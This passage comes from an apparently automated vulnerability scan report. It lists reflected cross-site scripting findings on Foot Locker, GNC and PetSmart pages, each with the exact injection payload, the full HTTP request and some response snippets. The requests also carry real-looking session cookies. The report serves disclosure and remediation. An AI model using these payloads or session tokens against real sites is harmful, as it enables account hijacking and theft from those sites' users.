Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

5.57. http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login.cfm

Issue detail

The value of the bv_RR_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b was submitted in the bv_RR_enabled parameter. This input was echoed as 327b2"style="x:expression(alert(1))"aca39a4f38b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

5.58. http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_forgotpassword.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 361dd"style%3d"x%3aexpression(alert(1))"9d00252baee was submitted in the bv_AA_enabled parameter. This input was echoed as 361dd"style="x:expression(alert(1))"9d00252baee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login_forgotpassword.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true361dd"style%3d"x%3aexpression(alert(1))"9d00252baee HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

5.59. http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_form.cfm

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 526f0"><script>alert(1)</script>8748cce5433 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E526f0"><script>alert(1)</script>8748cce5433 HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

5.60. http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_form.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71 was submitted in the bv_AA_enabled parameter. This input was echoed as 6784e"style="x:expression(alert(1))"6c3e0589f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

5.61. http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_form.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4cf"><script>alert(1)</script>a937fb8d7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/login_form.cfm?cc4cf"><script>alert(1)</script>a937fb8d7fa=1 HTTP/1.1
Host: www.footlocker.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

5.62. http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/community/index.jsp%20%20

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a33e7--><script>alert(1)</script>7d4814ce5e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /community/index.jsp%20%20?a33e7--><script>alert(1)</script>7d4814ce5e6=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 10:19:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=rHr7NQ6hxmbbQy3CRHv3dWTTBj0czv8myJPZNQ3PhPpJhckzF2jj!-1853905486; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 80212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm
...[SNIP]...
<script>alert(1)</script>7d4814ce5e6=1 -->
...[SNIP]...

5.63. http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/home/index.jsp

Issue detail

The value of the c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 request parameter is copied into an HTML comment. The payload 5f6c9--><script>alert(1)</script>7b7524930d was submitted in the c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=15f6c9--><script>alert(1)</script>7b7524930d HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543402575%7C1308135402575%3B%20gpv_p6%3DHome%2520Page%7C1305545202577%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:42 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<script>alert(1)</script>7b7524930d -->
...[SNIP]...

5.64. http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c5205--><script>alert(1)</script>bb446d17c91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--><script>alert(1)</script>bb446d17c91=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<script>alert(1)</script>bb446d17c91=1 -->
...[SNIP]...

5.65. https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 212ec--><script>alert(1)</script>8e54d0e09a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=orderTrackingLogin&212ec--><script>alert(1)</script>8e54d0e09a5=1 HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:16:20 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 97847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<script>alert(1)</script>8e54d0e09a5=1 -->
...[SNIP]...

5.66. http://www.petsmart.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5f832--><script>alert(1)</script>3105c4c3d6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?5f832--><script>alert(1)</script>3105c4c3d6e=1 HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
